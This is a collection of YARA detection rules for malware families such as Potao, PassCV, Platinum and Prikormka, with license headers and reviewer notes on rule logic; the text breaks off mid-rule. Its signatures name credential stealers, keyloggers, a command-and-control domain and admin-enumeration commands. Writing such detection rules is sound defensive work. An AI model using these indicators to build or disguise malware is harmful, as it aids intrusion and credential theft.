// private rule PotaoDecoy { strings: $mz = { 4d 5a } $str1 = "eroqw11" $str2 = "2sfsdf" $str3 = "RtlDecompressBuffer" $wiki_str = "spanned more than 100 years and ruined three consecutive" wide $old_ver1 = {53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 (00 | 78)} $old_ver2 = {6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00} condition: ($mz at 0) and ( (all of ($str*)) or any of ($old_ver*) or $wiki_str ) } private rule PotaoDll { strings: $mz = { 4d 5a } $dllstr1 = "?AVCncBuffer@@" $dllstr2 = "?AVCncRequest@@" $dllstr3 = "Petrozavodskaya, 11, 9" $dllstr4 = "_Scan@0" $dllstr5 = "\x00/sync/document/" $dllstr6 = "\\temp.temp" $dllname1 = "node69MainModule.dll" $dllname2 = "node69-main.dll" $dllname3 = "node69MainModuleD.dll" $dllname4 = "task-diskscanner.dll" $dllname5 = "\x00Screen.dll" $dllname6 = "Poker2.dll" $dllname7 = "PasswordStealer.dll" $dllname8 = "KeyLog2Runner.dll" $dllname9 = "GetAllSystemInfo.dll" $dllname10 = "FilePathStealer.dll" condition: ($mz at 0) and (any of ($dllstr*) and any of ($dllname*)) } private rule PotaoUSB { strings: $mz = { 4d 5a } $binary1 = { 33 C0 8B C8 83 E1 03 BA ?? ?? ?? 00 2B D1 8A 0A 32 88 ?? ?? ?? 00 2A C8 FE C9 88 88 ?? ?? ?? 00 40 3D ?? ?? 00 00 7C DA C3 } $binary2 = { 55 8B EC 51 56 C7 45 FC 00 00 00 00 EB 09 8B 45 FC 83 C0 01 89 45 FC 81 7D FC ?? ?? 00 00 7D 3D 8B 4D FC 0F BE 89 ?? ?? ?? 00 8B 45 FC 33 D2 BE 04 00 00 00 F7 F6 B8 03 00 00 00 2B C2 0F BE 90 ?? ?? ?? 00 33 CA 2B 4D FC 83 E9 01 81 E1 FF 00 00 00 8B 45 FC 88 88 ?? ?? ?? 
00 EB B1 5E 8B E5 5D C3} condition: ($mz at 0) and any of ($binary*) } private rule PotaoSecondStage { strings: $mz = { 4d 5a } // hash of CryptBinaryToStringA and CryptStringToBinaryA $binary1 = {51 7A BB 85 [10-180] E8 47 D2 A8} // old hash of CryptBinaryToStringA and CryptStringToBinaryA $binary2 = {5F 21 63 DD [10-30] EC FD 33 02} $binary3 = {CA 77 67 57 [10-30] BA 08 20 7A} $str1 = "?AVCrypt32Import@@" $str2 = "%.5llx" condition: ($mz at 0) and any of ($binary*) and any of ($str*) } rule Potao { meta: Author = "Anton Cherepanov" Date = "2015/07/29" Description = "Operation Potao" Reference = "http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf" Source = "https://github.com/eset/malware-ioc/" Contact = "threatintel@eset.com" License = "BSD 2-Clause" condition: PotaoDecoy or PotaoDll or PotaoUSB or PotaoSecondStage } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule backdoor_apt_pcclient { meta: author = "@patrickrolsen" maltype = "APT.PCCLient" filetype = "DLL" version = "0.1" description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)" date = "2012-10" strings: $magic = { 4d 5a } // MZ $string1 = "www.micro1.zyns.com" $string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" $string3 = "msacm32.drv" wide $string4 = "C:\\Windows\\Explorer.exe" wide $string5 = "Elevation:Administrator!" wide $string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb" condition: $magic at 0 and 4 of ($string*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ rule PassCV_Sabre_Malware_1 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a" hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55" strings: $x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii $x2 = "bin\\oSaberSvc.pdb" ascii $s1 = "cmd.exe /c MD " fullword ascii $s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" fullword wide $s3 = "CloudRun.exe" fullword wide $s4 = "SaberSvcB.exe" fullword wide $s5 = "SaberSvc.exe" fullword wide $s6 = "SaberSvcW.exe" fullword wide $s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" fullword wide $s8 = "Internet Connect Failed!" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and ( 1 of ($x*) and 5 of ($s*) ) ) or ( all of them ) } rule PassCV_Sabre_Malware_Signing_Cert { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" score = 50 hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e" strings: $s1 = "WOODTALE TECHNOLOGY INC" ascii $s2 = "Flyingbird Technology Limited" ascii $s3 = "Neoact Co., Ltd." 
ascii $s4 = "AmazGame Age Internet Technology Co., Ltd" ascii $s5 = "EMG Technology Limited" ascii $s6 = "Zemi Interactive Co., Ltd" ascii $s7 = "337 Technology Limited" ascii $s8 = "Runewaker Entertainment0" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 3000KB and 1 of them ) } rule PassCV_Sabre_Malware_2 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4" hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78" hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b" hash4 = "0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2" strings: $x1 = "ncProxyXll" fullword ascii $s1 = "Uniscribe.dll" fullword ascii $s2 = "WS2_32.dll" ascii $s3 = "ProxyDll" fullword ascii $s4 = "JDNSAPI.dll" fullword ascii $s5 = "x64.dat" fullword ascii $s6 = "LSpyb2" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 4000KB and $x1 ) or ( all of them ) } rule PassCV_Sabre_Malware_Excalibur_1 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb" hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70" strings: $x1 = "F:\\Excalibur\\Excalibur\\" ascii $x2 = "Excalibur\\bin\\Shell.pdb" ascii $x3 = "SaberSvc.exe" wide $s1 = "BBB.exe" fullword wide $s2 = "AAA.exe" fullword wide
/* NOTE(review): "and" binds tighter than "or" in YARA, so this condition parses as
   ( (MZ and size and 1 of ($x*)) or all of ($s*) ) or 3 of them. The all-of-$s branch therefore
   fires on the two generic names "AAA.exe"/"BBB.exe" alone, with no MZ header or size gate, which
   is a plausible false-positive source on non-PE content. If the gate was meant to cover both
   branches, the intended form would be
   uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or all of ($s*) ) — to be confirmed
   against the author's intent. PassCV_Sabre_Malware_5 later in this section has the same shape. */
condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of ($x*) or all of ($s*) ) or 3 of them } rule PassCV_Sabre_Malware_3 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = 
"https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1" strings: $x1 = "NXKILL" fullword wide $s1 = "2OLE32.DLL" fullword ascii $s2 = "localspn.dll" fullword wide $s3 = "!This is a Win32 program." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 8000KB and $x1 and 2 of ($s*) ) } rule PassCV_Sabre_Malware_4 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f" strings: $s1 = "QWNjZXB0On" fullword ascii /* base64 encoded string 'Accept:' */ $s2 = "VXNlci1BZ2VudDogT" fullword ascii /* b64: User-Agent: */ $s3 = "dGFzay5kbnME3luLmN" fullword ascii /* b64: task.dns[ */ condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule PassCV_Sabre_Tool_NTScan { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665" strings: $x1 = "NTscan.EXE" fullword wide $x2 = "NTscan Microsoft " fullword wide $s1 = "admin$" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 2 of them ) } rule PassCV_Sabre_Malware_5 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5" strings: $x1 = "ncircTMPg" fullword ascii $x2 = "~SHELL#" fullword ascii $x3 = "N.adobe.xm" fullword ascii $s1 = "NEL32.DLL" fullword ascii $s2 = "BitLocker.exe" fullword wide $s3 = "|xtplhd" fullword ascii 
/* reversed goodware string 'dhlptx|' */ $s4 = "SERVICECORE" fullword wide $s5 = "SHARECONTROL" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 4000KB and 1 of ($x*) or all of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule APT_Win_Pipcreat { meta: author = "chort (@chort0)" description = "APT backdoor Pipcreat" filetype = "pe,dll" date = "2013-03" MD5 = "f09d832bea93cf320986b53fce4b8397" // (incorrectly?) identified as Hupigon by many AV on VT Reference = "http://www.cyberengineeringservices.com/login-exe-analysis-trojan-pipcreat/" version = "1.0" strings: $strA = "pip creat failed" wide fullword $strB = "CraatePipe" ascii fullword $strC = "are you there? " wide fullword $strD = "success kill process ok" wide fullword $strE = "Vista|08|Win7" wide fullword $rut = "are you there!@#$%^&*()_+" ascii fullword condition: $rut or (2 of ($str*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ rule Trojan_Win32_PlaSrv { meta: author = "Microsoft" description = "Hotpatching Injector" original_sample_sha1 = "ff7f949da665ba8ce9fb01da357b51415634eaad" unpacked_sample_sha1 = "dff2fee984ba9f5a8f5d97582c83fca4fa1fe131" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $Section_name = ".hotp1" $offset_x59 = { C7 80 64 01 00 00 00 00 01 00 } condition: $Section_name and $offset_x59 } rule Trojan_Win32_Platual { meta: author = "Microsoft" description = "Installer component" original_sample_sha1 = "e0ac2ae221328313a7eee33e9be0924c46e2beb9" unpacked_sample_sha1 = "ccaf36c2d02c3c5ca24eeeb7b1eae7742a23a86a" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $class_name = "AVCObfuscation" $scrambled_dir = { A8 8B B8 E3 B1 D7 FE 85 51 32 3E C0 F1 B7 73 99 } condition: $class_name and $scrambled_dir } rule Trojan_Win32_Plaplex { meta: author = "Microsoft" description = "Variant of the JPin backdoor" original_sample_sha1 = "ca3bda30a3cdc15afb78e54fa1bbb9300d268d66" unpacked_sample_sha1 = "2fe3c80e98bbb0cf5a0c4da286cd48ec78130a24" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $class_name1 = "AVCObfuscation" $class_name2 = "AVCSetiriControl" condition: $class_name1 and $class_name2 } rule Trojan_Win32_Dipsind_B { meta: author = "Microsoft" description = "Dipsind Family" sample_sha1 = "09e0dfbb5543c708c0dd6a89fd22bbb96dc4ca1c" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $frg1 = {8D 90 04 01 00 00 33 C0 F2 AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 4D EC 8B 15 ?? ?? ?? ?? 89 91 ?? 
07 00 00 } $frg2 = {68 A1 86 01 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA} $frg3 = {C0 E8 07 D0 E1 0A C1 8A C8 32 D0 C0 E9 07 D0 E0 0A C8 32 CA 80 F1 63} condition: $frg1 and $frg2 and $frg3 } rule Trojan_Win32_PlaKeylog_B { meta: author = "Microsoft" description = "Keylogger component" original_sample_sha1 = "0096a3e0c97b85ca75164f48230ae530c94a2b77" unpacked_sample_sha1 = "6a1412daaa9bdc553689537df0a004d44f8a45fd" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $hook = {C6 06 FF 46 C6 06 25} $dasm_engine = {80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05} condition: $hook and $dasm_engine } rule Trojan_Win32_Adupib { meta: author = "Microsoft" description = "Adupib SSL Backdoor" original_sample_sha1 = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd" unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "POLL_RATE" $str2 = "OP_TIME(end hour)" $str3 = "%d:TCP:*:Enabled" $str4 = "%s[PwFF_cfg%d]" $str5 = "Fake_GetDlgItemTextW: ***value***=" condition: $str1 and $str2 and $str3 and $str4 and $str5 } rule Trojan_Win32_PlaLsaLog { meta: author = "Microsoft" description = "Loader / possible incomplete LSA Password Filter" original_sample_sha1 = "fa087986697e4117c394c9a58cb9f316b2d9f7d8" unpacked_sample_sha1 = "29cb81dbe491143b2f8b67beaeae6557d8944ab4" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {8A 1C 01 32 DA 88 1C 01 8B 74 24 0C 41 3B CE 7C EF 5B 5F C6 04 01 00 5E 81 C4 04 01 00 00 C3} $str2 = "PasswordChangeNotify" condition: $str1 and $str2 } rule Trojan_Win32_Plagon { meta: author = "Microsoft" description = "Dipsind variant" original_sample_sha1 = "48b89f61d58b57dba6a0ca857bce97bab636af65" unpacked_sample_sha1 = "6dccf88d89ad7b8611b1bc2e9fb8baea41bdb65a" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "VPLRXZHTU" $str2 = {64 6F 67 32 6A 7E 6C} $str3 = 
"Dqpqftk(Wou\"Isztk)" $str4 = "StartThreadAtWinLogon" condition: $str1 and $str2 and $str3 and $str4 } rule Trojan_Win32_Plakelog { meta: author = "Microsoft" description = "Raw-input based keylogger" original_sample_sha1 = "3907a9e41df805f912f821a47031164b6636bd04" unpacked_sample_sha1 = "960feeb15a0939ec0b53dcb6815adbf7ac1e7bb2" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "<0x02>" wide $str2 = "[CTR-BRK]" wide $str3 = "[/WIN]" wide $str4 = {8A 16 8A 18 32 DA 46 88 18 8B 15 08 E6 42 00 40 41 3B CA 72 EB 5E 5B} condition: $str1 and $str2 and $str3 and $str4 } rule Trojan_Win32_Plainst { meta: author = "Microsoft" description = "Installer component" original_sample_sha1 = "99c08d31af211a0e17f92dd312ec7ca2b9469ecb" unpacked_sample_sha1 = "dcb6cf7cf7c8fdfc89656a042f81136bda354ba6" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {66 8B 14 4D 18 50 01 10 8B 45 08 66 33 14 70 46 66 89 54 77 FE 66 83 7C 77 FE 00 75 B7 8B 4D FC 89 41 08 8D 04 36 89 41 0C 89 79 04} $str2 = {4b D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97} condition: $str1 and $str2 } rule Trojan_Win32_Plagicom { meta: author = "Microsoft" description = "Installer component" original_sample_sha1 = "99dcb148b053f4cef6df5fa1ec5d33971a58bd1e" unpacked_sample_sha1 = "c1c950bc6a2ad67488e675da4dfc8916831239a7" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {C6 44 24 ?? 68 C6 44 24 ?? 4D C6 44 24 ?? 53 C6 44 24 ?? 56 C6 44 24 ?? 
00} $str2 = "OUEMM/EMM" $str3 = {85 C9 7E 08 FE 0C 10 40 3B C1 7C F8 C3} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plaklog { meta: author = "Microsoft" description = "Hook-based keylogger" original_sample_sha1 = "831a5a29d47ab85ee3216d4e75f18d93641a9819" unpacked_sample_sha1 = "e18750207ddbd939975466a0e01bd84e75327dda" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "++[%s^^unknown^^%s]++" $str2 = "vtfs43/emm" $str3 = {33 C9 39 4C 24 08 7E 10 8B 44 24 04 03 C1 80 00 08 41 3B 4C 24 08 7C F0 C3} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plapiio { meta: author = "Microsoft" description = "JPin backdoor" original_sample_sha1 = "3119de80088c52bd8097394092847cd984606c88" unpacked_sample_sha1 = "3acb8fe2a5eb3478b4553907a571b6614eb5455c" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "ServiceMain" $str2 = "Startup" $str3 = {C6 45 ?? 68 C6 45 ?? 4D C6 45 ?? 53 C6 45 ?? 56 C6 45 ?? 6D C6 45 ?? 
6D} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plabit { meta: author = "Microsoft" description = "Installer component" sample_sha1 = "6d1169775a552230302131f9385135d385efd166" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {4b D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97} $str2 = "GetInstanceW" $str3 = {8B D0 83 E2 1F 8A 14 0A 30 14 30 40 3B 44 24 04 72 EE} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Placisc2 { meta: author = "Microsoft" description = "Dipsind variant" original_sample_sha1 = "bf944eb70a382bd77ee5b47548ea9a4969de0527" unpacked_sample_sha1 = "d807648ddecc4572c7b04405f496d25700e0be6e" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {76 16 8B D0 83 E2 07 8A 4C 14 24 8A 14 18 32 D1 88 14 18 40 3B C7 72 EA } $str2 = "VPLRXZHTU" $str3 = "%d) Command:%s" $str4 = {0D 0A 2D 2D 2D 2D 2D 09 2D 2D 2D 2D 2D 2D 0D 0A} condition: $str1 and $str2 and $str3 and $str4 } rule Trojan_Win32_Placisc3 { meta: author = "Microsoft" description = "Dipsind variant" original_sample_sha1 = "1b542dd0dacfcd4200879221709f5fa9683cdcda" unpacked_sample_sha1 = "bbd4992ee3f3a3267732151636359cf94fb4575d" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {BA 6E 00 00 00 66 89 95 ?? ?? FF FF B8 73 00 00 00 66 89 85 ?? ?? FF FF B9 64 00 00 00 66 89 8D ?? ?? FF FF BA 65 00 00 00 66 89 95 ?? ?? FF FF B8 6C 00 00 00} $str2 = "VPLRXZHTU" $str3 = {8B 44 24 ?? 
8A 04 01 41 32 C2 3B CF 7C F2 88 03} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Placisc4 { meta: author = "Microsoft" description = "Installer for Dipsind variant" original_sample_sha1 = "3d17828632e8ff1560f6094703ece5433bc69586" unpacked_sample_sha1 = "2abb8e1e9cac24be474e4955c63108ff86d1a034" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {8D 71 01 8B C6 99 BB 0A 00 00 00 F7 FB 0F BE D2 0F BE 04 39 2B C2 88 04 39 84 C0 74 0A} $str2 = {6A 04 68 00 20 00 00 68 00 00 40 00 6A 00 FF D5} $str3 = {C6 44 24 ?? 64 C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 32 C6 44 24 ?? 6A} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plakpers { meta: author = "Microsoft" description = "Injector / loader component" original_sample_sha1 = "fa083d744d278c6f4865f095cfd2feabee558056" unpacked_sample_sha1 = "3a678b5c9c46b5b87bfcb18306ed50fadfc6372e" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "MyFileMappingObject" $str2 = "[%.3u] %s %s %s [%s:" wide $str3 = "%s\\{%s}\\%s" wide condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plainst2 { meta: author = "Microsoft" description = "Zc tool" original_sample_sha1 = "3f2ce812c38ff5ac3d813394291a5867e2cddcf2" unpacked_sample_sha1 = "88ff852b1b8077ad5a19cc438afb2402462fbd1a" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "Connected [%s:%d]..." 
$str2 = "reuse possible: %c" $str3 = "] => %d%%\x0a" condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plakpeer { meta: author = "Microsoft" description = "Zc tool v2" original_sample_sha1 = "2155c20483528377b5e3fde004bb604198463d29" unpacked_sample_sha1 = "dc991ef598825daabd9e70bac92c79154363bab2" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "@@E0020(%d)" wide $str2 = /exit.{0,3}@exit.{0,3}new.{0,3}query.{0,3}rcz.{0,3}scz/ wide $str3 = "---###---" wide $str4 = "---@@@---" wide condition: $str1 and $str2 and $str3 and $str4 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-02-09 Identifier: Poseidon Group APT */ rule PoseidonGroup_Malware { meta: description = "Detects Poseidon Group Malware" author = "Florian Roth" reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" date = "2016-02-09" score = 85 hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4" hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3" hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61" hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47" hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f" hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb" hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3" strings: $s1 = "c:\\winnt\\system32\\cmd.exe" fullword ascii $s2 = "c:\\windows\\system32\\cmd.exe" fullword ascii $s3 = "c:\\windows\\command.com" fullword ascii $s4 = "copy \"%s\" \"%s\" /Y" fullword ascii $s5 = "http://%s/files/" fullword ascii $s6 = "\"%s\". %s: \"%s\"." 
fullword ascii $s7 = "0x0666" fullword ascii $s8 = "----------------This_is_a_boundary$" fullword ascii $s9 = "Server 2012" fullword ascii /* Goodware String - occured 1 times */ $s10 = "Server 2008" fullword ascii /* Goodware String - occured 1 times */ $s11 = "Server 2003" fullword ascii /* Goodware String - occured 1 times */ $a1 = "net.exe group \"Domain Admins\" /domain" fullword ascii $a2 = "net.exe group \"Admins. do Dom" fullword ascii $a3 = "(SVRID=%d)" fullword ascii $a4 = "(TG=%d)" fullword ascii $a5 = "(SVR=%s)" fullword ascii $a6 = "Set-Cookie:\\b*{.+?}\\n" fullword wide $a7 = "net.exe localgroup Administradores" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 650KB and 6 of ($s*) ) or ( 4 of ($s*) and 1 of ($a*) ) } rule PoseidonGroup_MalDoc_1 { meta: description = "Detects Poseidon Group - Malicious Word Document" author = "Florian Roth" reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" date = "2016-02-09" score = 80 hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b" strings: $s1 = "c:\\cmd32dll.exe" fullword ascii condition: uint16(0) == 0xcfd0 and filesize < 500KB and all of them } rule PoseidonGroup_MalDoc_2 { meta: description = "Detects Poseidon Group - Malicious Word Document" author = "Florian Roth" reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" date = "2016-02-09" score = 70 hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c" hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af" hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a" hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed" hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778" hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216" strings: 
$s0 = "{\\*\\generator Msftedit 5.41." ascii $s1 = "Attachment 1: Complete Professional Background" ascii $s2 = "E-mail: \\cf1\\ul\\f1" $s3 = "Education:\\par" ascii $s5 = "@gmail.com" ascii condition: uint32(0) == 0x74725c7b and filesize < 500KB and 3 of them } // Operation Groundbait yara rules // For feedback or questions contact us at: github@eset.com // https://github.com/eset/malware-ioc/ // // These yara rules are provided to the community under the two-clause BSD // license as follows: // // Copyright (c) 2016, ESET // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
//
// The lone "//" line above closes the BSD license header; it must stay on its
// own line, because if this file is ever collapsed onto a single line the
// comment swallows the rule declaration that follows it.
rule PrikormkaDropper
{
    // Prikormka (Operation Groundbait) dropper: an MZ header plus either one
    // of the embedded binary fragments ($bin*), three of the KD* wide
    // strings, or both "?AV...@@" names (these look like MSVC RTTI type
    // descriptor names for Cinj2008Dlg / Cinj2008App classes).
    strings:
        $mz = { 4D 5A }
        $kd1 = "KDSTORAGE" wide
        $kd2 = "KDSTORAGE_64" wide
        $kd3 = "KDRUNDRV32" wide
        $kd4 = "KDRAR" wide
        $bin1 = {69 65 04 15 00 14 1E 4A 16 42 08 6C 21 61 24 0F}
        $bin2 = {76 6F 05 04 16 1B 0D 5E 0D 42 08 6C 20 45 18 16}
        // UTF-16LE "MMC\0guidVGA\0_svg"
        $bin3 = {4D 00 4D 00 43 00 00 00 67 00 75 00 69 00 64 00 56 00 47 00 41 00 00 00 5F 00 73 00 76 00 67 00}
        $inj1 = "?AVCinj2008Dlg@@" ascii
        $inj2 = "?AVCinj2008App@@" ascii
    condition:
        ($mz at 0) and ((any of ($bin*)) or (3 of ($kd*)) or (all of ($inj*)))
}
rule PrikormkaModule
{
    // Prikormka plug-in modules: an MZ header plus ANY single one of the
    // $str* strings (DLL names paired with what look like export names,
    // encrypted blobs, mutex names, DLL file names, log/file name formats and
    // PDB path fragments).
    // NOTE(review): with `any of ($str*)` one hit is sufficient, so the short
    // members ($str16, the path pieces $str29/$str30) dominate the
    // false-positive risk; confirm against a goodware corpus before using
    // this rule for automated action.
    strings:
        $mz = { 4D 5A }
        // binary
        $str1 = {6D 70 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00}                             // "mp.dll\0Starting\0"
        $str2 = {68 6C 70 75 63 74 66 2E 64 6C 6C 00 43 79 63 6C 65}                          // "hlpuctf.dll\0Cycle"
